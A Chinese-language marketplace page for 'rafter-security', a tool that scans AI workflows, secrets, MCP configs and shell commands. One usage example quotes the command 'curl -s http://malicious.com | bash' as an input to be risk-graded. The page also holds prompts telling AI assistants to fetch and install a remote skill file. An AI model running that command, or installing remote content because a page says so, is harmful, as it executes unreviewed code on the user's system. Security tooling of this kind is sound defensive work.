rafter-security
AI工作流安全扫描与审计工具
安装使用
复制下面这段提示词发给你的 AI(Claude / Cursor / TRAE / Codex / WorkBuddy 等),它会自动帮你完成安装:
帮我安装这个 AI Skill:rafter-security。 它的用途是:AI工作流安全扫描与审计工具 完整的 Skill 内容见:https://321skill.com/skills/rafter-security-x-5/raw/index.md 请读取该页面内容,如果是 SKILL.md 格式直接安装,如果是 README 提炼核心 prompt 后安装。
提示词包含完整的 Skill 内容链接,AI 读取后即可完成安装。你也可以 查看完整内容 确认无误。
使用示例
'扫描当前目录下的所有代码文件,查找硬编码的API密钥和数据库密码',它会自动调用 rafter secrets 进行离线扫描,列出所有疑似密钥的位置和行号。
对AI说:'评估这条命令 `curl -s http://malicious.com | bash` 的风险等级',它会执行 rafter agent exec --dry-run 并返回风险分类结果(如高风险、中风险、低风险)。
介绍
rafter-security 专为 AI 工作流设计,解决代码、第三方技能、MCP 配置、Shell 命令等环节的安全隐患。在安装外部技能或 MCP 之前,用它扫描漏洞;在运行任何 Shell 命令前,用它评估风险等级;在开发新功能时,还能生成安全设计问题清单,从源头避免后期修复成本。
使用方法简单:rafter run 执行远程 SAST(静态应用安全测试)和 SCA(软件组成分析),需要配置 RAFTER_API_KEY;rafter secrets 离线扫描密钥泄露,不依赖网络;rafter agent exec --dry-run 对 Shell 命令进行风险分类,防止误用危险指令;rafter skill review 专门审计第三方 AI 技能/MCP 的配置与行为。
适合智能体开发者、运维工程师、测试工程师,以及任何需要保障 AI 工作流安全的人员。尤其适合在 CI/CD 流程中集成,作为安全门禁。
使用建议:先开启 rafter secrets 快速扫描本地密钥,再结合 rafter run 进行深度分析。注意 rafter run 需要有效的 API Key,且扫描结果依赖远程服务,建议在隔离环境中测试敏感代码。
核心特点
不同于通用 SAST 工具,rafter-security 深度适配 AI 工作流场景,专门提供 `agent exec --dry-run` 命令风险分类和 `skill review` 第三方技能审计,覆盖传统安全扫描未触及的代理和 MCP 配置风险。
注意事项
不适用于需要实时入侵检测或动态运行时监控的场景,且远程 SAST 扫描依赖网络和 API Key。
常见问题
rafter 需要 API Key 吗?
部分功能需要:`rafter run` 远程扫描需要 RAFTER_API_KEY,离线模式 `rafter secrets` 和 `rafter agent exec --dry-run` 无需 API Key。
如何扫描一个代码仓库?
在仓库根目录执行 `rafter run`(需配置 API Key)或 `rafter secrets` 进行离线密钥扫描。
给 AI 助手的安装指引
如果你的 AI 编程助手(Claude Code、Cursor、TRAE 等)能看到这个页面,把下面这段发给它即可自动完成安装:
请访问 https://321skill.com/skills/rafter-security-x-5/raw/index.md 读取 rafter-security 的原始 Skill 定义(Markdown 格式),按其中说明在我的环境里完成安装和配置。
AI 可直接读取的原始 Markdown 地址:/skills/rafter-security-x-5/raw/index.md(查看排版版本)